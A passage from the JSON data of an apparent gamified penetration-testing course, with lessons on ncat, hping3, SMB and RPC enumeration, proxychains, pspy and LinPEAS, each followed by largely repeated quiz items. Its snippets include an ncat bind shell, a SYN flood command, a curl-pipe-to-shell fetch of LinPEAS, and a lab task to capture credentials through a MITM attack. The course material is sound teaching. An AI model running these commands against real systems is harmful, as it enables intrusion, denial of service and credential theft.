differs from netcat by...","opts":["Being simpler","Supporting SSL, PTY, and complex relay configurations","Being faster","Using UDP only"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-ncat","cat":"Network Attacks","title":"Ncat (Nmap's Netcat)","diff":1,"xp":75,"intro":"Modern netcat replacement with SSL and proxy support.","sections":[{"type":"text","content":"Modern netcat replacement with SSL and proxy support."},{"type":"code","lang":"bash","content":"ncat --ssl -nlvp 4444  # encrypted listener\nncat --proxy proxy:8080 --proxy-type http target 80\nncat -e /bin/bash -nlvp 4444  # bind shell"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Ncat adds over netcat...","opts":["Nothing","SSL encryption and proxy support","Speed","Stealth"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-hping3","cat":"Network Attacks","title":"hping3 Packet Crafting","diff":3,"xp":200,"intro":"Craft custom TCP/UDP/ICMP packets.","sections":[{"type":"text","content":"Craft custom TCP/UDP/ICMP packets."},{"type":"code","lang":"bash","content":"hping3 -S target -p 80 -c 3  # SYN to port 80\nhping3 --flood -S target -p 80  # SYN flood\nhping3 -1 target  # ICMP\nhping3 -2 target -p 53  # UDP"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"hping3's -S flag sends...","opts":["FIN packets","SYN packets","ACK packets","RST packets"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-enum4linux-ng","cat":"Network Attacks","title":"enum4linux-ng","diff":2,"xp":150,"intro":"Modern Windows/Samba enumeration.","sections":[{"type":"text","content":"Modern Windows/Samba enumeration."},{"type":"code","lang":"bash","content":"enum4linux-ng -A target\nenum4linux-ng -u user -p pass target"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"enum4linux-ng enumerates...","opts":["Web apps","Windows/Samba users, shares, groups, and policies","DNS","Databases"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-smbmap","cat":"Network Attacks","title":"SMBMap Share Enumeration","diff":2,"xp":150,"intro":"List and access SMB shares with permissions.","sections":[{"type":"text","content":"List and access SMB shares with permissions."},{"type":"code","lang":"bash","content":"smbmap -H target\nsmbmap -H target -u user -p pass\nsmbmap -H target -u user -p pass -R  # recursive listing"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SMBMap shows...","opts":["Open ports","Share names and access permissions (read/write)","User passwords","Network topology"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-proxychains","cat":"Network Attacks","title":"Proxychains Traffic Routing","diff":2,"xp":150,"intro":"Route any tool's traffic through a SOCKS proxy.","sections":[{"type":"text","content":"Route any tool's traffic through a SOCKS proxy."},{"type":"code","lang":"bash","content":"# Configure: /etc/proxychains.conf\n# socks5 127.0.0.1 1080\nproxychains nmap -sT 10.0.0.0/24\nproxychains curl http://internal.target.com"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["DNS","A SOCKS proxy for pivoting","A VPN","A firewall"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-n-rpcclient","cat":"Network Attacks","title":"RPC Enumeration","diff":2,"xp":150,"intro":"Enumerate Windows via RPC null sessions.","sections":[{"type":"text","content":"Enumerate Windows via RPC null sessions."},{"type":"code","lang":"bash","content":"rpcclient -U '' -N target\nrpcclient $> enumdomusers\nrpcclient $> enumdomgroups\nrpcclient $> queryuser 0x1f4"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"RPC enumeration reveals...","opts":["Open ports","Domain users, groups, and SIDs","File contents","Network topology"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"g-pe-linux-pspy","cat":"Privilege Escalation","title":"pspy Process Monitor","diff":1,"xp":75,"intro":"Monitor processes without root \u2014 catch cron jobs and scripts.","sections":[{"type":"text","content":"Monitor processes without root \u2014 catch cron jobs and scripts."},{"type":"code","lang":"bash","content":"./pspy64\n# Watch for: root processes, cron executions, script runs\n# Identifies: writable scripts run by root, cronjobs not in crontab"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"pspy is useful because...","opts":["It's fast","It monitors processes without needing root","It scans networks","It cracks passwords"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-linpeas","cat":"Privilege Escalation","title":"LinPEAS Enumeration","diff":1,"xp":75,"intro":"Automated Linux privilege escalation enumeration.","sections":[{"type":"text","content":"Automated Linux privilege escalation enumeration."},{"type":"code","lang":"bash","content":"curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\n# Or transfer and run\nchmod +x linpeas.sh && ./linpeas.sh"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"LinPEAS checks for...","opts":["Only SUID binaries","Hundreds of privesc vectors at once","Only kernel exploits","Only passwords"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root 